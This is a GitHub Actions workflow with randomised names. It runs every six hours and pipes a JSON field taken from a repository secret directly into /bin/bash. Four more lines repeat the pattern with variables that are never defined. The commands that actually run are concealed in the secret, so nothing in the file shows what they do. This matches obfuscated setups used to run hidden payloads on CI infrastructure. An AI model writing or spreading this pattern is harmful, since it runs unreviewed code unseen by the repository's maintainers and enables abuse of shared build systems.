name: pengqi19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '53 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pengqi19871010
        env:
          gkoh366: ${{ secrets.gkoh366 }}
        run: |
          echo $gkoh366 | jq -r .q2 | /bin/bash
          echo $jr0 | jq -r .vwuw946 | /bin/bash
          echo $pbn1393 | jq -r .xqlob0 | /bin/bash
          echo $q1 | jq -r .zzvpy3598 | /bin/bash
          echo $yapkp073 | jq -r .cuah097 | /bin/bash

